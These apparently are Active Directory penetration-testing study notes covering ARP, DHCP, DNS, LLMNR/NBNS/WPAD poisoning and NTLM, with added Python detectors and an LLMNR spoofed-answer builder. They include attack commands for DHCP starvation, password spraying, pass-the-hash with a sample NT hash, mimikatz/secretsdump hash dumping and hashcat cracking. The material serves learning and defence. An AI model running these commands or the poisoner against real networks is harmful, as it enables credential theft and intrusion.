- Person-in-The-Middle (PitM), where the attacker intercepts the communication of the user and may interact with it if it is not encrypted
- NTLM Relay attack, using the NTLM authentication from a victim and redirecting it to a malicious server
- NTLM crack attack, where the attacker just tries to crack the NTLM hash
What are the 3 types of addresses that need to be resolved?
MAC address -> unique identifier of each computer in the world. Messages are sent via the Ethernet protocol (it can be altered with spoofing)
IP address -> used by the IP protocol on the internet layer. Allows communication between different computers in the same network (you can read more about IP address attribution with DHCP or static IPs)
Hostnames -> Just like websites and DNS, hostnames help us memorize and interact with computers through human-friendly names like computerOfFelix rather than just an IP that is hard to remember
What are some vital processes for computers when it comes to finding the correct address to comunicate?
Hostname-IP resolution
- To map a hostname to its IP, computers can ask a central server for hostname resolution (which is what DNS does) or they can send a broadcast request asking all the computers to identify themselves (used by NetBIOS, LLMNR, mDNS)
IP-MAC resolution
- Once we find an IP, we can broadcast to everyone to tell the network card of the computer to identify itself, asking for the MAC address related to the IP using the ARP protocol
IP configuration
- Whether it’s done manually or dynamically using DHCP, we need to configure the IP of a computer. The danger when it’s done dynamically is that the computer is not configured yet and asks blindly for the DHCP server using broadcast, so it can be tricked if an attacker has a fake DHCP server that, for example, hands out a fake DNS server
What is ARP?
ARP (Address Resolution Protocol) allows mapping the relation between the IP address of a computer and its MAC (Media Access Control) address.
The client machine sends a broadcast ARP request to the local network, asking for the one that has the target IP address. Then the computer with that IP should respond, identifying its MAC. Finally the client sends the application packets to that Ethernet address.
Explain ARP Spoofing
An attacker could try to respond to all ARP requests to impersonate other computers. To add a layer of security, rather than sending ARP requests every time they communicate, computers keep the old responses in their ARP cache to reduce the number of requests needed.
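The ARP cache described above is also where a defender notices spoofing: an IP whose cached MAC suddenly changes, or one MAC answering for several IPs. This added Python (my example, not from the notes) runs that check over a constructed log of ARP replies and also compares the gateway against a pinned entry, the software equivalent of a static ARP entry. The log format, addresses and MACs are all constructed.

```python
import re

# Constructed ARP reply log (assumption: "<time> reply <ip> is-at <mac>" per line).
SAMPLE_ARP_LOG = """\
12:00:01 reply 192.168.100.1 is-at 00:11:22:33:44:55
12:00:02 reply 192.168.100.2 is-at 00:11:22:33:44:66
12:00:05 reply 192.168.100.1 is-at de:ad:be:ef:00:01
12:00:06 reply 192.168.100.2 is-at de:ad:be:ef:00:01
12:00:09 reply 192.168.100.7 is-at 00:11:22:33:44:77
"""
LINE_RE = re.compile(r"^(\S+) reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9a-f:]{17})$")


def detect_arp_conflicts(log_text, pinned=None):
    """Replay ARP replies into a cache and report the symptoms of spoofing.
    pinned: {ip: mac} entries that must never change (gateway, DC, ...).
    Returns a list of (time, subject, description) findings in detection order."""
    pinned = pinned or {}
    cache, findings = {}, []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue                      # ignore lines that are not ARP replies
        ts, ip, mac = m.groups()
        if ip in pinned and mac != pinned[ip]:
            findings.append((ts, ip, f"pinned entry violated: expected {pinned[ip]}, got {mac}"))
        old = cache.get(ip)
        if old and old != mac:
            findings.append((ts, ip, f"mac changed {old} -> {mac}"))
        cache[ip] = mac                   # this is what a real cache would now believe
    # One MAC claiming several IPs is the other classic symptom.
    by_mac = {}
    for ip, mac in cache.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("-", mac, f"claims multiple ips: {sorted(ips)}"))
    return findings


if __name__ == "__main__":
    for f in detect_arp_conflicts(SAMPLE_ARP_LOG, pinned={"192.168.100.1": "00:11:22:33:44:55"}):
        print(f)
```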
Explain how DHCP works
DHCP helps configure dynamic IP addresses for the computers of a network. When new to a network, the foreign computer will look for the DHCP server to get a config that allows it to interact with the network. It works in 4 steps:
-> Broadcast from the client to find a DHCP server
-> Server responds to the request with a valid IP
-> Client receives the IP and sends a message to the server to request it
-> Server confirms the client can use the IP and config params like the IP renewal time
What is a Rogue DHCP server
A rogue DHCP server is a device on a network that, without permission, gives out IP addresses and network settings to devices, which can cause network problems and security risks. Therefore it is the perfect tool for an attacker, who could create a rogue DHC​P server in order to set a custom configuration in the clients and redirect them to fake computers or domains controlled by the attacker.
Explain DHCP Starvation attack:
It’s a DoS attack where a fake client requests all the available IPs the DHCP server has to offer, making it impossible for legitimate users to obtain an IP:
$ dhcpstarv -i enp7s0
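The three DHCP questions above (the 4-step exchange, the rogue server and starvation) fit in one small simulation. This added Python (mine, not from the notes) plays the client and two servers, one legitimate and one rogue, and shows why "first offer wins" is dangerous, what an allowlist of trusted server identifiers (the idea behind DHCP snooping on a switch) changes, and what the client sees once the pool is exhausted. Server identifiers, pools and options are constructed.

```python
from dataclasses import dataclass, field


@dataclass
class DhcpMessage:
    kind: str                 # DISCOVER, OFFER, REQUEST or ACK
    xid: int                  # transaction id shared by the four messages of one exchange
    client_mac: str
    server_id: str = ""       # option 54: the server that sent, or was chosen by, the message
    yiaddr: str = ""          # "your" IP address being offered / acknowledged
    options: dict = field(default_factory=dict)   # e.g. dns, lease_time


class DhcpServer:
    """Minimal server: hands out addresses from a pool and remembers its offers."""

    def __init__(self, server_id, pool, options):
        self.server_id, self.pool, self.options = server_id, list(pool), dict(options)
        self.pending = {}     # xid -> address offered but not yet acknowledged

    def handle(self, msg):
        if msg.kind == "DISCOVER" and self.pool:
            ip = self.pool.pop(0)
            self.pending[msg.xid] = ip
            return DhcpMessage("OFFER", msg.xid, msg.client_mac, self.server_id, ip, dict(self.options))
        if msg.kind == "REQUEST" and msg.xid in self.pending:
            ip = self.pending.pop(msg.xid)
            if msg.server_id == self.server_id:
                return DhcpMessage("ACK", msg.xid, msg.client_mac, self.server_id, ip, dict(self.options))
            self.pool.insert(0, ip)   # client chose another server: reclaim the address
        return None                   # no free address (starvation) or nothing to say


def run_exchange(client_mac, xid, servers, trusted_servers):
    """Broadcast DISCOVER, collect every OFFER, keep only offers from trusted servers,
    then REQUEST the first acceptable one and return (ACK or None, rejected server ids)."""
    discover = DhcpMessage("DISCOVER", xid, client_mac)
    offers = [o for o in (s.handle(discover) for s in servers) if o]
    rejected = [o.server_id for o in offers if o.server_id not in trusted_servers]
    accepted = [o for o in offers if o.server_id in trusted_servers]
    if not accepted:
        return None, rejected
    chosen = accepted[0]
    request = DhcpMessage("REQUEST", xid, client_mac, chosen.server_id, chosen.yiaddr)
    acks = [a for a in (s.handle(request) for s in servers) if a and a.kind == "ACK"]
    return (acks[0] if acks else None), rejected


if __name__ == "__main__":
    legit = DhcpServer("192.168.100.2", ["192.168.100.50"], {"dns": "192.168.100.2", "lease_time": 3600})
    rogue = DhcpServer("192.168.100.66", ["192.168.100.200"], {"dns": "192.168.100.66", "lease_time": 3600})
    lease, rejected = run_exchange("aa:bb:cc:dd:ee:01", 1, [rogue, legit], {"192.168.100.2"})
    print("lease:", lease.yiaddr, lease.options, "rejected offers from:", rejected)
```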
DNS
What is DNS?
DNS is a protocol that resolves the DNS name of a computer to its address (port 53). It can also be used to map an IP to its name or to resolve the aliases of a name.
What are DNS zones?
DNS is hierarchical; each zone keeps records for its domain and the subdomains attached to it. Let’s take 2 zones for example:
Zone contoso.com
contoso.com
Zone internal.contoso.com
internal.contoso.com
Those are 2 independent zones, which makes it easier to keep track. The DNS server will communicate with those zones in order to provide information to other zones.
To get the www.contoso.com IP address, the DNS server needs to communicate with the contoso authoritative DNS server, which manages the contoso.com zone, in order to retrieve this information.
Explain DNS exfiltration:
Let’s say we have a server that is isolated and has no internet access, but it can perform DNS queries. If the local DNS server forwards requests to other DNS servers on the internet, it can be abused: let’s say I have the DNS server for malicious.com; every query made to it or to its subdomains will reach my server. An attacker could query a subdomain like felix.malicious.com and, technically, the query should go through the parent domain, thus exfiltrating information. (An attacker can use a tool like iodine or dnscat2.)
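The defender's side of this is the query log of the local DNS server: data smuggled in labels shows up as one client asking for many distinct, long, high-entropy subdomains of one registered domain. The following Python is an added example (mine, not from the notes) that scores a constructed log with exactly that heuristic; the log format, thresholds, addresses and the malicious.com names are all assumptions.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed query log (assumption: "<time> <client> <qtype> <qname>" per line).
SAMPLE_DNS_LOG = """\
10:00:01 192.168.100.20 A www.contoso.com
10:00:02 192.168.100.20 A mail.contoso.com
10:00:03 192.168.100.21 A login.microsoftonline.com
10:00:10 192.168.100.20 A 4f8a2c9d1e0b7f3a6c5d8e9f0a1b2c3d.felix.malicious.com
10:00:11 192.168.100.20 A 9b1e7c3a5d2f8e0b4a6c1d9f3e7b5a2c.felix.malicious.com
10:00:12 192.168.100.20 A 0c2d4e6f8a1b3c5d7e9f0a2b4c6d8e1f.felix.malicious.com
10:00:13 192.168.100.20 A 7a9b1c3d5e7f9a0b2c4d6e8f1a3b5c7d.felix.malicious.com
10:00:14 192.168.100.20 A e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6.felix.malicious.com
10:00:15 192.168.100.20 A 5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a.felix.malicious.com
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def label_entropy(label):
    """Shannon entropy in bits per character of one DNS label."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values()) if n else 0.0


def registered_domain(qname):
    """Last two labels (assumption: no public-suffix list; fine for .com/.local)."""
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])


def detect_dns_tunnelling(log_text, min_unique=5, max_label_len=30, min_entropy=3.5):
    """Group queries by (client, registered domain). A pair is suspicious when the
    client asked for many distinct names AND the leftmost labels look like encoded
    data (long on average, or high entropy). Returns a list of finding dicts."""
    seen = defaultdict(set)      # (client, domain) -> distinct query names
    labels = defaultdict(list)   # (client, domain) -> leftmost labels seen
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        _, client, _, qname = m.groups()
        key = (client, registered_domain(qname))
        seen[key].add(qname.lower())
        labels[key].append(qname.split(".")[0])
    findings = []
    for key, names in seen.items():
        if len(names) < min_unique:
            continue
        avg_len = sum(map(len, labels[key])) / len(labels[key])
        avg_ent = sum(map(label_entropy, labels[key])) / len(labels[key])
        if avg_len > max_label_len or avg_ent > min_entropy:
            findings.append({"client": key[0], "domain": key[1], "unique_names": len(names),
                             "avg_label_len": round(avg_len, 1), "avg_entropy": round(avg_ent, 2)})
    return findings


if __name__ == "__main__":
    for f in detect_dns_tunnelling(SAMPLE_DNS_LOG):
        print(f)
```

The same statistics are what you would feed into an alert rule on a real resolver's logs; the thresholds need tuning per environment, since CDN and telemetry domains also produce long labels, which is why the rule requires both volume and label shape before firing.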
How can DNS zone transfer be dangerous?
We know that zone transfer replicates all the DNS server records. If misconfigured, anyone could perform zone transfers.
If just one DC allows the zone transfer whereas the rest of the DCs refuse it, the misconfigured DC could lead to anyone being able to perform zone transfers, thus collecting all the DNS information without requiring any credentials.
What to do if zone transfers aren’t allowed?
Since DNS records are stored in the AD database, we can read them using LDAP as any domain user and then dump all the DNS records; we can use adidnsdump to do so and it will save the output in a records.csv file
What is ADIDNS?
ADIDNS Spoofing (thehacker.recipes)
ADIDNS is the Active Directory’s implementation of DNS. In this setup, the role of the DNS server is assumed by the Domain Controller (DC). This is because the Active Directory database contains the DNS names of the computers within the domain as well as other DNS records. This integration allows for seamless name resolution and management of DNS entries within the Active Directory environment.
What are DNS dynamic updates?
Dynamic updates allow clients to create/modify/delete DNS records. Since any user can create a DNS record, the user that created the record becomes its owner; thus, only authorized users of a certain record can update, modify or delete it
How could Dynamic updates be abused?
Exploiting ADIDNS (NetSPI Blog)
ADIDNS Revisited (NetSPI Blog)
Since DNS records are stored in the Active Directory database, they can be created/modified/deleted by using LDAP.
Registering a wildcard record (*) could be interesting since it’s used to specify a default IP address that is used to resolve those queries that don’t match any other record. It could lead to PitM attacks if it is used to point to a computer controlled by us.
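The zone hierarchy from the "What are DNS zones?" question and the wildcard behaviour just described can be shown with one small resolver. This added Python (mine, not from the notes) picks the authoritative zone by longest suffix, answers from explicit records or the wildcard, and ends with the check a defender runs after reading the ADIDNS records: wildcard records whose owner is not an administrative principal. Zone contents, owners and addresses are constructed.

```python
# Constructed zone data (assumption, not a real DNS server). Each zone maps a
# relative record name to (address, owner); the owner models the principal that
# created the record through a dynamic update.
ZONES = {
    "contoso.com": {
        "www": ("203.0.113.10", "CONTOSO\\Domain Admins"),
        "mail": ("203.0.113.20", "CONTOSO\\Domain Admins"),
    },
    "internal.contoso.com": {
        "dc01": ("192.168.100.2", "CONTOSO\\Domain Admins"),
        "ws01": ("192.168.100.50", "CONTOSO\\WS01$"),      # self-registered by the workstation
        "*": ("192.168.100.99", "CONTOSO\\eve"),           # wildcard added by an ordinary user
    },
}
ADMIN_OWNERS = {"CONTOSO\\Domain Admins", "CONTOSO\\DnsAdmins"}


def authoritative_zone(name, zones=ZONES):
    """Longest zone suffix that matches the name on a label boundary, or None."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in zones:
            return candidate
    return None


def resolve(name, zones=ZONES):
    """Return (status, zone, address). Status is OK, WILDCARD, APEX, NXDOMAIN or
    REFUSED (no zone here is authoritative for that name)."""
    zone = authoritative_zone(name, zones)
    if zone is None:
        return ("REFUSED", None, None)
    full = name.lower().rstrip(".")
    relative = full[: len(full) - len(zone)].rstrip(".")
    records = zones[zone]
    if relative == "":
        return ("APEX", zone, None)
    if relative in records:
        return ("OK", zone, records[relative][0])
    if "*" in records:                 # default answer for anything not explicitly defined
        return ("WILDCARD", zone, records["*"][0])
    return ("NXDOMAIN", zone, None)


def audit_wildcards(zones=ZONES, admin_owners=ADMIN_OWNERS):
    """Wildcard records not owned by an administrative principal: every mistyped or
    stale name in that zone resolves to whatever address the owner chose."""
    return [(zone, recs["*"][0], recs["*"][1])
            for zone, recs in zones.items()
            if "*" in recs and recs["*"][1] not in admin_owners]


if __name__ == "__main__":
    for n in ("www.contoso.com", "dc01.internal.contoso.com", "typo.internal.contoso.com",
              "typo.contoso.com", "internal.contoso.com", "example.org"):
        print(n, resolve(n))
    print("wildcards to review:", audit_wildcards())
```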
What is NETBIOS?
NetBIOS (Network Basic Input/Output System) helps applications in the same LAN (Local Area Network) communicate with each other. However, it was not able to make them communicate across different networks, so this led to the creation of the NBT protocol (NetBIOS over TCP/IP) to make NetBIOS work over the TCP and UDP protocols and allow applications that used NetBIOS to communicate over the internet.
What are the 3 services used by NETBIOS?
- NetBIOS Datagram Service -> used as the transport layer for application protocols that require a connectionless communication.
- NetBIOS Session Service -> used as the transport for connection-oriented communications
- NetBIOS Name Service -> This one is very interesting for pentesting; it allows to:
  - Resolve a NetBIOS name to an IP address
  - Know the status of a NetBIOS node
  - Register/Release a NetBIOS name
What is the NBNS protocol and how does it work?
The NBNS was implemented as WINS (Windows Internet Name Service). In a network, each Windows computer has a WINS database that stores the available network resources, NetBIOS and domain names.
So in order to resolve a NetBIOS name we can query the WINS server or, if this is not possible, the query can be sent to the IP broadcast address, waiting for the answer from the target computer (but this is dangerous since anyone can respond; this is what responder.py uses)
What is LLMNR?
LLMNR (Link-Local Multicast Name Resolution) is a decentralized protocol to resolve hostnames in the local network without any server: the client sends a DNS-formatted query to the multicast address 224.0.0.252 (FF02::1:3) on UDP 5355 and accepts whoever answers. Windows uses it when DNS fails to resolve a name (a typo, a decommissioned host). Since anyone on the link can reply, responder.py abuses it too: the victim then connects to the attacker's host and hands over an NTLM challenge-response, or gets relayed.
What is mDNS?
mDNS (multicast DNS) is a decentralized protocol similar to LLMNR (multicast 224.0.0.251, UDP 5353, names under .local), originally from Apple and also supported by recent Windows versions; it can be poisoned in the same way.
What is WPAD?
WPAD (Web Proxy Auto-Discovery) is the protocol browsers (and any client using automatic proxy detection) use to find their proxy configuration: they look for a host named wpad (through DHCP option 252 and name resolution, including the LLMNR/NBNS fallback) and download a wpad.dat file from it. Whoever answers for "wpad" can push a proxy of their choice and receive the victim's web traffic and proxy authentication; this is why responder.py also serves WPAD.
What is the difference between those protocols?
All of them perform name resolution; the difference lies in the transport (unicast to a server versus multicast/broadcast on the link) and in the order in which Windows tries them when resolving a name:
- DNS (Domain Name System): first, always, against the configured servers
- mDNS (Multicast DNS)
- LLMNR (Link-Local Multicast Name Resolution)
- NBNS (NetBIOS Name Service): last, by broadcast
Every step after DNS trusts whoever on the local link answers first. That is why Responder-style poisoning works, and why the fix is on the client side: disable LLMNR and NetBIOS over TCP/IP through GPO/DHCP, and make sure DNS answers for the names clients actually use (keeping in mind that a stray wildcard record, see ADIDNS above, changes this picture).
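As an added example (my own code, not from the original page or from Responder), here is what the LLMNR poisoning step described above looks like on the wire: a parser for the DNS-formatted query a Windows host multicasts when DNS has failed, and the builder of the spoofed answer that points the name at the attacker. The host name filesrv01, the transaction id and the IP addresses are constructed sample values; the functions only build and parse packets, and sending them would require a UDP socket bound to port 5355 that has joined 224.0.0.252.

```python
import socket
import struct

# Added example, not code from the original page or from Responder: the LLMNR
# (RFC 4795) exchange a poisoner takes part in. LLMNR reuses the DNS message
# layout, carried over UDP 5355 to multicast 224.0.0.252. Names, transaction
# id and addresses are constructed sample values; the functions only build and
# parse packets and never touch the network.

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS wire form: length-prefixed labels ending with a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".") if l) + b"\x00"


def decode_name(buf: bytes, offset: int):
    """Return (name, offset after the name). LLMNR does not use pointer compression."""
    labels = []
    while True:
        length = buf[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        if length & 0xC0:
            raise ValueError("compression pointer not allowed in LLMNR")
        labels.append(buf[offset:offset + length].decode("ascii"))
        offset += length


def build_llmnr_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """What a Windows host multicasts after DNS failed to resolve `name`."""
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack(">HH", qtype, QCLASS_IN)


def parse_llmnr_query(packet: bytes) -> dict:
    txid, flags, qdcount, _, _, _ = struct.unpack(">HHHHHH", packet[:12])
    if flags & 0x8000:
        raise ValueError("not a query: QR bit is set")
    if qdcount != 1:
        raise ValueError("LLMNR queries carry exactly one question")
    name, offset = decode_name(packet, 12)
    qtype, qclass = struct.unpack(">HH", packet[offset:offset + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_llmnr_answer(query: dict, spoofed_ip: str, ttl: int = 30) -> bytes:
    """The poisoned reply: same transaction id, QR=1, question echoed, one A record pointing at us."""
    header = struct.pack(">HHHHHH", query["txid"], 0x8000, 1, 1, 0, 0)
    question = encode_name(query["name"]) + struct.pack(">HH", query["qtype"], QCLASS_IN)
    rdata = socket.inet_aton(spoofed_ip)
    rr = encode_name(query["name"]) + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + rr


def parse_llmnr_answer(packet: bytes) -> dict:
    """What the victim's resolver extracts from the first reply it receives."""
    txid, flags, _, ancount, _, _ = struct.unpack(">HHHHHH", packet[:12])
    _, offset = decode_name(packet, 12)
    offset += 4                                        # skip qtype/qclass of the echoed question
    name, offset = decode_name(packet, offset)
    rtype, _, ttl, rdlen = struct.unpack(">HHIH", packet[offset:offset + 10])
    offset += 10
    return {"txid": txid, "is_response": bool(flags & 0x8000), "answers": ancount, "name": name,
            "ttl": ttl, "ip": socket.inet_ntoa(packet[offset:offset + rdlen]) if rtype == QTYPE_A else None}


def poison(packet: bytes, attacker_ip: str, only_a: bool = True):
    """The whole poisoner step: victim query in, spoofed answer out (None if we choose not to answer)."""
    q = parse_llmnr_query(packet)
    if only_a and q["qtype"] != QTYPE_A:
        return None
    return build_llmnr_answer(q, attacker_ip)


if __name__ == "__main__":
    # Constructed scenario: a client mistyped a share host name that DNS could not resolve.
    victim_query = build_llmnr_query(0x1234, "filesrv01")
    print(parse_llmnr_answer(poison(victim_query, "10.0.0.66")))
```

The same message layout serves mDNS (UDP 5353, 224.0.0.251, answers flagged authoritative), and NBNS differs mainly in its encoded 16-byte names. The defensive reading of the code is that nothing in the answer authenticates the responder, so the only real fix is not to ask: disable LLMNR (Computer Configuration > Administrative Templates > Network > DNS Client > Turn off multicast name resolution) and NetBIOS over TCP/IP.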
Authentication
In Active Directory there are two network authentication protocols available: NTLM and Kerberos.
Kerberos is the preferred option for domain accounts. Local computer accounts are not known to the KDC, so they can only authenticate over the network with NTLM; NTLM is also the fallback whenever Kerberos cannot be used (target addressed by IP, no SPN registered, non-domain host).
What are Windows SSPs?
SSPs (Security Support Providers) are implemented as dynamic link libraries (DLLs) loaded by LSASS and by the processes that require security services. Applications do not speak NTLM or Kerberos themselves: they call the SSPI (Security Support Provider Interface) and the selected SSP produces and consumes the protocol messages.
In an Active Directory environment, SSPs are crucial for:
- User Authentication: Ensuring that users can securely log in to the network and access resources based on their permissions.
- Service Authentication: Verifying the identity of services and applications to prevent unauthorized access and ensure secure communication.
- Secure Communication: Protecting data transmitted over the network through encryption and integrity checks.
- Interoperability: Supporting different protocols and ensuring compatibility across various systems and applications within the network.
Give me some names of different SSPs
- Kerberos SSP
- The Kerberos SSP (kerberos.dll) manages Kerberos authentication.
- NTLM SSP
- The NTLM SSP (msv1_0.dll) manages NTLM authentication (and local SAM logons).
- Negotiate SSP
- The Negotiate SSP selects the protocol through SPNEGO: Kerberos when it is possible, otherwise NTLM. It is what most applications ask for, which is why forcing an NTLM fallback (see below) works.
- Digest SSP
- The Digest SSP (wdigest.dll) implements Digest Access authentication. This is the SSP that kept the plaintext password in LSASS memory on old operating systems (before Windows 8.1/2012 R2, or on newer ones if UseLogonCredential is set to 1 under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest), retrievable with mimikatz sekurlsa::wdigest.
- Secure Channel SSP
- The Secure Channel SSP (schannel.dll) provides SSL/TLS encrypted communications.
- Cred SSP
- CredSSP (credssp.dll) delegates the user's full credentials to a remote server (RDP with Network Level Authentication, PowerShell Remoting with -Authentication CredSSP), which means the remote machine ends up holding the plaintext credentials.
What is SPNEGO?
SPNEGO (Simple and Protected GSSAPI Negotiation Mechanism) is the standard mechanism that lets a client and a server agree on an authentication protocol: the client offers the mechanisms it supports (in Active Directory, Kerberos and NTLM), the server picks the first one it also supports, and the chosen protocol's messages are then carried inside the SPNEGO tokens. On Windows it is implemented by the Negotiate SSP, which prefers Kerberos and falls back to NTLM when Kerberos cannot be used.
What is NTLM?
NTLM (NT LAN Manager) is an authentication protocol Windows services use to verify the identity of a client. It is good to know that NTLM is not an isolated protocol that generates its own network traffic: its messages are embedded in an application protocol, such as SMB, LDAP or HTTP.
What are the 3 stages of an NTLM connection?
NEGOTIATE, CHALLENGE and AUTHENTICATE.
(diagram: client --NEGOTIATE--> server; client <--CHALLENGE-- server; client --AUTHENTICATE--> server)
How does NTLM work more in detail?
- First, the client sends a NEGOTIATE message to the server indicating the options it supports (NTLM version, signing/sealing, key exchange...).
- The server asks its NTLM SSP for an 8-byte random challenge and sends it to the client in a CHALLENGE message, together with the confirmed options and its target information (computer name, domain name, OS version).
- The client computes a response to the challenge using its key, the NT hash (in NTLMv2, an HMAC-MD5 key derived from the NT hash, the user name and the domain). If key exchange was negotiated, it also generates a random session key and sends it encrypted with the key exchange key, itself derived from the NT hash and the response. Response and encrypted session key go back to the server in the AUTHENTICATE message.
- Finally, the server verifies the response (against the local SAM for a local account, through a Domain Controller for a domain account, which also returns the key material) and, if it is correct, both sides now hold the same session key with which to sign and seal the application traffic.
(diagram: the same three messages; the NT hash is the only secret the client ever needs)
What is the difference between NTLMv1 and NTLMv2?
In NTLMv1 the response (the "NTLMv1 hash") is computed by padding the 16-byte NT hash to 21 bytes, splitting it into three DES keys and encrypting the 8-byte server challenge with each of them; the session key is also derived from the NT hash alone. The server challenge is the only variable input, so responses are cheap to brute-force and, when the challenge is fixed, can even be turned back into the NT hash with precomputed tables.
In NTLMv2 more data is mixed in to protect the integrity of the AUTHENTICATE message: a client challenge, a timestamp and the target information received in the CHALLENGE are concatenated into a blob.
NTLMv2 then computes the response (the "NTLMv2 hash") as an HMAC-MD5 over the server challenge and that blob, keyed with the NTLMv2 key (itself an HMAC-MD5 of the NT hash over the upper-cased user name and the domain).
How does NTLM interract in Active Directory?
It is good to remember that the NT hash of a domain account is stored only in the Active Directory database on the Domain Controllers, not on the member server that receives the authentication.
So in order to verify the AUTHENTICATE message for a domain account, the target machine sends the challenge and the client's response to a DC over its Netlogon secure channel and asks it to validate them. The DC checks the response against the stored NT hash and, on success, returns the user's information (SIDs, group memberships) and the session base key to the machine.
(diagram: client --NTLM--> server --Netlogon validation--> DC)
The same works for accounts of other domains: the server's DC cannot validate the response itself, so it forwards the request over the trust to a DC of the user's account domain (pass-through authentication).
(diagram: client --NTLM--> server --Netlogon--> DC of the server domain --trust--> DC of the user domain)
How do we force NTLM authentication over Kerberos?
A way to force NTLM authentication over Kerberos is to connect to the target machine by IP address instead of hostname: Kerberos identifies the service by an SPN built from the hostname, so with an IP address no SPN can be matched and Negotiate falls back to NTLM.
For example
    dir \\dc01\C$
uses Kerberos to authenticate against the remote share, while
    dir \\192.168.100.2\C$
uses NTLM.
How does NTLM brute-force work?
NTLM authentication can be attempted against any service that exposes it, so plenty of tools (hydra, nmap scripts, CrackMapExec/NetExec, Invoke-BruteForce.ps1) can test a list of passwords for a working one:
    cme smb 192.168.100.10 -u elfelixio -p passwords.txt
Remember that for domain accounts every attempt is validated by a Domain Controller: each failure counts against the account lockout threshold and produces logon failure events (4776 on the DC, 4625 on the target), so check the domain lockout policy before spraying.
How does pass the hash work?
NTLM computes the response and the session key from the NT hash, never from the password itself, so holding the NT hash is enough to authenticate and impersonate the user without knowing the cleartext password.
On a Linux host the impacket scripts accept the hash as a parameter (in LM:NT form; the LM part can be left empty):
    psexec.py contoso.local/Anakin@192.168.100.10 -hashes :cdeae556dc28c24b5b7b14e9df5b6e21
How do we extract the NT hashes?
To extract NT hashes you can:
- read them from LSASS memory with the mimikatz sekurlsa::logonpasswords command (users currently logged on), or dump the LSASS process (procdump, comsvcs.dll MiniDump, sqldumper...) and parse the dump offline with mimikatz or pypykatz, or do it remotely with lsassy;
- dump the local SAM database (mimikatz lsadump::sam, secretsdump.py) for local accounts;
- dump the NTDS.dit database of a Domain Controller (locally with ntdsutil or a shadow copy, or remotely with DCSync) for every domain account.
How does NTLM Relay work?
NTLM Relay Explained (hackndo)
In this attack the attacker gets a client to authenticate to them (poisoning, coercion, a malicious link) and forwards each NTLM message unchanged to a server of its choice, so that the server ends up with a session authenticated as the victim (a Person-in-The-Middle attack):
(diagram: client --NTLM--> attacker --NTLM--> server)
Even after getting the session authenticated, the attacker does not know the session key (it derives from the NT hash), so if signing is required between client and server the attacker cannot produce valid signatures for the application messages and the session is useless. That is why SMB signing, LDAP signing and channel binding (EPA) are the mitigations, and why relays target services where they are not enforced. Relaying the authentication back to the machine it came from has been blocked since MS08-068.
How to crack NTLM hashes?
What a Person-in-The-Middle tool such as Responder.py or Inveigh captures is not the NT hash but the NTLMv1/v2 challenge-response (Net-NTLM), which cannot be passed but can be cracked offline.
Example Inveigh (GitBook)
You can find some examples here
Then we can crack the capture with hashcat: mode 5600 for NTLMv2, 5500 for NTLMv1 (and mode 1000 for a real NT hash obtained from SAM, NTDS.dit or LSASS).
Example Cracking (GitBook)
You can also find examples of hash cracking here
It is good to know that NTLMv1 responses are far faster to crack than NTLMv2 ones: they are built with DES on the NT hash and, if the capturing tool imposed a fixed challenge (1122334455667788), the response can even be reversed to the NT hash itself.
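To tie together the NTLM mechanics, pass the hash, signing and the hashcat 5600 format discussed above, here is an added example (my own code, not the page's or any tool's): the NTLMv2 computation of MS-NLMP written in Python with hashlib/hmac and a hand-written MD4, since OpenSSL 3 builds of Python often lack hashlib.new("md4"). The user anakin, the domain CONTOSO, the password, both challenges, the target info and the timestamp are constructed sample values.

```python
import hashlib
import hmac
import struct

# Added example, not code from the original page: the NTLMv2 computation of
# MS-NLMP from a password (or directly from the NT hash), the server-side check,
# and the hashcat mode 5600 line a poisoner/relay tool logs. MD4 is written out
# because OpenSSL 3 builds of Python often lack hashlib.new("md4"). User, domain,
# password, challenges and timestamp below are constructed sample values.


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, the hash behind the NT hash."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [(i % 4) * 4 + i // 4 for i in range(16)]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i in range(16):
                a = rotl((a + fn(b, c, d) + x[order[i]] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
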